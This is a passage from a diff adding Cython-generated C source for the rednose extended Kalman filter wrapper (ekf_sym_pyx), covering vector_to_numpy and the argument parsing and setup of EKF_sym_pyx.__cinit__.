+ __Pyx_memviewslice __pyx_v_mem_view = { 0, 0, { 0 }, { 0 }, { 0 } }; + PyArrayObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + double *__pyx_t_1; + struct __pyx_array_obj *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + __Pyx_memviewslice __pyx_t_5 = { 0, 0, { 0 }, { 0 }, { 0 } }; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + PyObject *__pyx_t_9 = NULL; + PyObject *__pyx_t_10 = NULL; + int __pyx_t_11; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("vector_to_numpy", 0); + __Pyx_TraceCall("vector_to_numpy", __pyx_f[0], 77, 0, __PYX_ERR(0, 77, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":78 + * @cython.boundscheck(False) + * cdef np.ndarray[np.float64_t, ndim=1, mode="c"] vector_to_numpy(VectorXd arr): + * cdef double[:] mem_view = arr.data() # <<<<<<<<<<<<<< + * return np.copy(np.asarray(mem_view, dtype=np.double, order="C")) + * + */ + __pyx_t_1 = __pyx_v_arr.data(); + if (!__pyx_t_1) { + PyErr_SetString(PyExc_ValueError,"Cannot create cython.array from NULL pointer"); + __PYX_ERR(0, 78, __pyx_L1_error) + } + __pyx_t_4 = __pyx_format_from_typeinfo(&__Pyx_TypeInfo_double); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_3 = Py_BuildValue((char*) "(" __PYX_BUILD_PY_SSIZE_T ")", ((Py_ssize_t)__pyx_v_arr.rows())); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_2 = __pyx_array_new(__pyx_t_3, sizeof(double), PyBytes_AS_STRING(__pyx_t_4), (char *) "c", (char *) __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_5 = __Pyx_PyObject_to_MemoryviewSlice_ds_double(((PyObject *)__pyx_t_2), PyBUF_WRITABLE); if (unlikely(!__pyx_t_5.memview)) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_DECREF((PyObject *)__pyx_t_2); __pyx_t_2 = 0; + __pyx_v_mem_view = __pyx_t_5; + __pyx_t_5.memview = NULL; + __pyx_t_5.data = NULL; + + /* "rednose/helpers/ekf_sym_pyx.pyx":79 + * cdef np.ndarray[np.float64_t, ndim=1, mode="c"] vector_to_numpy(VectorXd arr): + * cdef double[:] mem_view = arr.data() + * return np.copy(np.asarray(mem_view, dtype=np.double, order="C")) # <<<<<<<<<<<<<< + * + * cdef class EKF_sym_pyx: + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_np); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_copy); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_np); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_asarray); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __pyx_memoryview_fromslice(__pyx_v_mem_view, 1, (PyObject *(*)(char *)) __pyx_memview_get_double, (int (*)(char *, PyObject *)) __pyx_memview_set_double, 0);; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_8 = PyTuple_New(1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_t_3); + __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyDict_NewPresized(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_np); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __pyx_t_10 = __Pyx_PyObject_GetAttrStr(__pyx_t_9, __pyx_n_s_double); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_dtype, __pyx_t_10) < 0) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_order, __pyx_n_u_C) < 0) __PYX_ERR(0, 79, __pyx_L1_error) + __pyx_t_10 = __Pyx_PyObject_Call(__pyx_t_7, __pyx_t_8, __pyx_t_3); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = NULL; + __pyx_t_11 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_11 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_t_10}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_11, 1+__pyx_t_11); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + if (!(likely(((__pyx_t_4) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_4, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 79, __pyx_L1_error) + __pyx_r = ((PyArrayObject *)__pyx_t_4); + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":77 + * @cython.wraparound(False) + * @cython.boundscheck(False) + * cdef np.ndarray[np.float64_t, ndim=1, mode="c"] vector_to_numpy(VectorXd arr): # <<<<<<<<<<<<<< + * cdef double[:] mem_view = arr.data() + * return np.copy(np.asarray(mem_view, dtype=np.double, order="C")) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF((PyObject *)__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __PYX_XCLEAR_MEMVIEW(&__pyx_t_5, 1); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_XDECREF(__pyx_t_9); + __Pyx_XDECREF(__pyx_t_10); + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.vector_to_numpy", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __PYX_XCLEAR_MEMVIEW(&__pyx_v_mem_view, 1); + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":83 + * cdef class EKF_sym_pyx: + * cdef EKFSym* ekf + * def __cinit__(self, str gen_dir, str name, np.ndarray[np.float64_t, ndim=2] Q, # <<<<<<<<<<<<<< + * np.ndarray[np.float64_t, ndim=1] x_initial, np.ndarray[np.float64_t, ndim=2] P_initial, int dim_main, + * int dim_main_err, int N=0, int dim_augment=0, int dim_augment_err=0, list maha_test_kinds=[], + */ + +/* Python wrapper */ +static int __pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + CYTHON_UNUSED PyObject *__pyx_v_gen_dir = 0; + PyObject *__pyx_v_name = 0; + PyArrayObject *__pyx_v_Q = 0; + PyArrayObject *__pyx_v_x_initial = 0; + PyArrayObject *__pyx_v_P_initial = 0; + int __pyx_v_dim_main; + int __pyx_v_dim_main_err; + int __pyx_v_N; + int __pyx_v_dim_augment; + int __pyx_v_dim_augment_err; + PyObject *__pyx_v_maha_test_kinds = 0; + PyObject *__pyx_v_quaternion_idxs = 0; + PyObject *__pyx_v_global_vars = 0; + double __pyx_v_max_rewind_age; + CYTHON_UNUSED PyObject *__pyx_v_logger = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_gen_dir,&__pyx_n_s_name,&__pyx_n_s_Q,&__pyx_n_s_x_initial,&__pyx_n_s_P_initial,&__pyx_n_s_dim_main,&__pyx_n_s_dim_main_err,&__pyx_n_s_N,&__pyx_n_s_dim_augment,&__pyx_n_s_dim_augment_err,&__pyx_n_s_maha_test_kinds,&__pyx_n_s_quaternion_idxs,&__pyx_n_s_global_vars,&__pyx_n_s_max_rewind_age,&__pyx_n_s_logger,0}; + PyObject* values[15] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0}; + values[10] = __pyx_k__17; + values[11] = __pyx_k__18; + values[12] = __pyx_k__19; + + /* "rednose/helpers/ekf_sym_pyx.pyx":86 + * np.ndarray[np.float64_t, ndim=1] x_initial, np.ndarray[np.float64_t, ndim=2] P_initial, int dim_main, + * int dim_main_err, int N=0, int dim_augment=0, int dim_augment_err=0, list maha_test_kinds=[], + * list quaternion_idxs=[], list global_vars=[], double max_rewind_age=1.0, logger=None): # <<<<<<<<<<<<<< + * # TODO logger + * + */ + values[14] = ((PyObject *)Py_None); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 15: values[14] = __Pyx_Arg_VARARGS(__pyx_args, 14); + CYTHON_FALLTHROUGH; + case 14: values[13] = __Pyx_Arg_VARARGS(__pyx_args, 13); + CYTHON_FALLTHROUGH; + case 13: values[12] = __Pyx_Arg_VARARGS(__pyx_args, 12); + CYTHON_FALLTHROUGH; + case 12: values[11] = __Pyx_Arg_VARARGS(__pyx_args, 11); + CYTHON_FALLTHROUGH; + case 11: values[10] = __Pyx_Arg_VARARGS(__pyx_args, 10); + CYTHON_FALLTHROUGH; + case 10: values[9] = __Pyx_Arg_VARARGS(__pyx_args, 9); + CYTHON_FALLTHROUGH; + case 9: values[8] = __Pyx_Arg_VARARGS(__pyx_args, 8); + CYTHON_FALLTHROUGH; + case 8: values[7] = __Pyx_Arg_VARARGS(__pyx_args, 7); + CYTHON_FALLTHROUGH; + case 7: values[6] = __Pyx_Arg_VARARGS(__pyx_args, 6); + CYTHON_FALLTHROUGH; + case 6: values[5] = __Pyx_Arg_VARARGS(__pyx_args, 5); + CYTHON_FALLTHROUGH; + case 5: values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_gen_dir)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 7, 15, 1); __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_Q)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 7, 15, 2); __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (likely((values[3] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_x_initial)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 7, 15, 3); __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 4: + if (likely((values[4] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_P_initial)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 7, 15, 4); __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 5: + if (likely((values[5] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dim_main)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 7, 15, 5); __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 6: + if (likely((values[6] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dim_main_err)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 7, 15, 6); __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 7: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_N); + if (value) { values[7] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 8: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dim_augment); + if (value) { values[8] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 9: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dim_augment_err); + if (value) { values[9] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 10: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_maha_test_kinds); + if (value) { values[10] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 11: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_quaternion_idxs); + if (value) { values[11] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 12: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_global_vars); + if (value) { values[12] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 13: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_max_rewind_age); + if (value) { values[13] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 14: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_logger); + if (value) { values[14] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(0, 83, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 15: values[14] = __Pyx_Arg_VARARGS(__pyx_args, 14); + CYTHON_FALLTHROUGH; + case 14: values[13] = __Pyx_Arg_VARARGS(__pyx_args, 13); + CYTHON_FALLTHROUGH; + case 13: values[12] = __Pyx_Arg_VARARGS(__pyx_args, 12); + CYTHON_FALLTHROUGH; + case 12: values[11] = __Pyx_Arg_VARARGS(__pyx_args, 11); + CYTHON_FALLTHROUGH; + case 11: values[10] = __Pyx_Arg_VARARGS(__pyx_args, 10); + CYTHON_FALLTHROUGH; + case 10: values[9] = __Pyx_Arg_VARARGS(__pyx_args, 9); + CYTHON_FALLTHROUGH; + case 9: values[8] = __Pyx_Arg_VARARGS(__pyx_args, 8); + CYTHON_FALLTHROUGH; + case 8: values[7] = __Pyx_Arg_VARARGS(__pyx_args, 7); + CYTHON_FALLTHROUGH; + case 7: values[6] = __Pyx_Arg_VARARGS(__pyx_args, 6); + values[5] = __Pyx_Arg_VARARGS(__pyx_args, 5); + values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_gen_dir = ((PyObject*)values[0]); + __pyx_v_name = ((PyObject*)values[1]); + __pyx_v_Q = ((PyArrayObject *)values[2]); + __pyx_v_x_initial = ((PyArrayObject *)values[3]); + __pyx_v_P_initial = ((PyArrayObject *)values[4]); + __pyx_v_dim_main = __Pyx_PyInt_As_int(values[5]); if (unlikely((__pyx_v_dim_main == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 84, __pyx_L3_error) + __pyx_v_dim_main_err = __Pyx_PyInt_As_int(values[6]); if (unlikely((__pyx_v_dim_main_err == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 85, __pyx_L3_error) + if (values[7]) { + __pyx_v_N = __Pyx_PyInt_As_int(values[7]); if (unlikely((__pyx_v_N == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 85, __pyx_L3_error) + } else { + __pyx_v_N = ((int)0); + } + if (values[8]) { + __pyx_v_dim_augment = __Pyx_PyInt_As_int(values[8]); if (unlikely((__pyx_v_dim_augment == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 85, __pyx_L3_error) + } else { + __pyx_v_dim_augment = ((int)0); + } + if (values[9]) { + __pyx_v_dim_augment_err = __Pyx_PyInt_As_int(values[9]); if (unlikely((__pyx_v_dim_augment_err == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 85, __pyx_L3_error) + } else { + __pyx_v_dim_augment_err = ((int)0); + } + __pyx_v_maha_test_kinds = ((PyObject*)values[10]); + __pyx_v_quaternion_idxs = ((PyObject*)values[11]); + __pyx_v_global_vars = ((PyObject*)values[12]); + if (values[13]) { + __pyx_v_max_rewind_age = __pyx_PyFloat_AsDouble(values[13]); if (unlikely((__pyx_v_max_rewind_age == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 86, __pyx_L3_error) + } else { + __pyx_v_max_rewind_age = ((double)1.0); + } + __pyx_v_logger = values[14]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 7, 15, __pyx_nargs); __PYX_ERR(0, 83, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_gen_dir), (&PyUnicode_Type), 1, "gen_dir", 1))) __PYX_ERR(0, 83, __pyx_L1_error) + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_name), (&PyUnicode_Type), 1, "name", 1))) __PYX_ERR(0, 83, __pyx_L1_error) + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_Q), __pyx_ptype_5numpy_ndarray, 1, "Q", 0))) __PYX_ERR(0, 83, __pyx_L1_error) + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_x_initial), __pyx_ptype_5numpy_ndarray, 1, "x_initial", 0))) __PYX_ERR(0, 84, __pyx_L1_error) + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_P_initial), __pyx_ptype_5numpy_ndarray, 1, "P_initial", 0))) __PYX_ERR(0, 84, __pyx_L1_error) + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_maha_test_kinds), (&PyList_Type), 1, "maha_test_kinds", 1))) __PYX_ERR(0, 85, __pyx_L1_error) + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_quaternion_idxs), (&PyList_Type), 1, "quaternion_idxs", 1))) __PYX_ERR(0, 86, __pyx_L1_error) + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_global_vars), (&PyList_Type), 1, "global_vars", 1))) __PYX_ERR(0, 86, __pyx_L1_error) + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx___cinit__(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self), __pyx_v_gen_dir, __pyx_v_name, __pyx_v_Q, __pyx_v_x_initial, __pyx_v_P_initial, __pyx_v_dim_main, __pyx_v_dim_main_err, __pyx_v_N, __pyx_v_dim_augment, __pyx_v_dim_augment_err, __pyx_v_maha_test_kinds, __pyx_v_quaternion_idxs, __pyx_v_global_vars, __pyx_v_max_rewind_age, __pyx_v_logger); + + /* "rednose/helpers/ekf_sym_pyx.pyx":83 + * cdef class EKF_sym_pyx: + * cdef EKFSym* ekf + * def __cinit__(self, str gen_dir, str name, np.ndarray[np.float64_t, ndim=2] Q, # <<<<<<<<<<<<<< + * np.ndarray[np.float64_t, ndim=1] x_initial, np.ndarray[np.float64_t, ndim=2] P_initial, int dim_main, + * int dim_main_err, int N=0, int dim_augment=0, int dim_augment_err=0, list maha_test_kinds=[], + */ + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx___cinit__(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_gen_dir, PyObject *__pyx_v_name, PyArrayObject *__pyx_v_Q, PyArrayObject *__pyx_v_x_initial, PyArrayObject *__pyx_v_P_initial, int __pyx_v_dim_main, int __pyx_v_dim_main_err, int __pyx_v_N, int __pyx_v_dim_augment, int __pyx_v_dim_augment_err, PyObject *__pyx_v_maha_test_kinds, PyObject *__pyx_v_quaternion_idxs, PyObject *__pyx_v_global_vars, double __pyx_v_max_rewind_age, CYTHON_UNUSED PyObject *__pyx_v_logger) { + PyArrayObject *__pyx_v_Q_b = 0; + PyArrayObject *__pyx_v_x_initial_b = 0; + PyArrayObject *__pyx_v_P_initial_b = 0; + PyObject *__pyx_7genexpr__pyx_v_x = NULL; + __Pyx_LocalBuf_ND __pyx_pybuffernd_P_initial; + __Pyx_Buffer __pyx_pybuffer_P_initial; + __Pyx_LocalBuf_ND __pyx_pybuffernd_P_initial_b; + __Pyx_Buffer __pyx_pybuffer_P_initial_b; + __Pyx_LocalBuf_ND __pyx_pybuffernd_Q; + __Pyx_Buffer __pyx_pybuffer_Q; + __Pyx_LocalBuf_ND __pyx_pybuffernd_Q_b; + __Pyx_Buffer __pyx_pybuffer_Q_b; + __Pyx_LocalBuf_ND __pyx_pybuffernd_x_initial; + __Pyx_Buffer __pyx_pybuffer_x_initial; + __Pyx_LocalBuf_ND __pyx_pybuffernd_x_initial_b; + __Pyx_Buffer __pyx_pybuffer_x_initial_b; + int __pyx_r; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyArrayObject *__pyx_t_6 = NULL; + PyArrayObject *__pyx_t_7 = NULL; + PyArrayObject *__pyx_t_8 = NULL; + std::string __pyx_t_9; + char *__pyx_t_10; + npy_intp *__pyx_t_11; + npy_intp *__pyx_t_12; + char *__pyx_t_13; + npy_intp *__pyx_t_14; + char *__pyx_t_15; + npy_intp *__pyx_t_16; + npy_intp *__pyx_t_17; + std::vector __pyx_t_18; + std::vector __pyx_t_19; + Py_ssize_t __pyx_t_20; + int __pyx_t_21; + std::vector __pyx_t_22; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + __Pyx_TraceCall("__cinit__", __pyx_f[0], 83, 0, __PYX_ERR(0, 83, __pyx_L1_error)); + __pyx_pybuffer_Q_b.pybuffer.buf = NULL; + __pyx_pybuffer_Q_b.refcount = 0; + __pyx_pybuffernd_Q_b.data = NULL; + __pyx_pybuffernd_Q_b.rcbuffer = &__pyx_pybuffer_Q_b; + __pyx_pybuffer_x_initial_b.pybuffer.buf = NULL; + __pyx_pybuffer_x_initial_b.refcount = 0; + __pyx_pybuffernd_x_initial_b.data = NULL; + __pyx_pybuffernd_x_initial_b.rcbuffer = &__pyx_pybuffer_x_initial_b; + __pyx_pybuffer_P_initial_b.pybuffer.buf = NULL; + __pyx_pybuffer_P_initial_b.refcount = 0; + __pyx_pybuffernd_P_initial_b.data = NULL; + __pyx_pybuffernd_P_initial_b.rcbuffer = &__pyx_pybuffer_P_initial_b; + __pyx_pybuffer_Q.pybuffer.buf = NULL; + __pyx_pybuffer_Q.refcount = 0; + __pyx_pybuffernd_Q.data = NULL; + __pyx_pybuffernd_Q.rcbuffer = &__pyx_pybuffer_Q; + __pyx_pybuffer_x_initial.pybuffer.buf = NULL; + __pyx_pybuffer_x_initial.refcount = 0; + __pyx_pybuffernd_x_initial.data = NULL; + __pyx_pybuffernd_x_initial.rcbuffer = 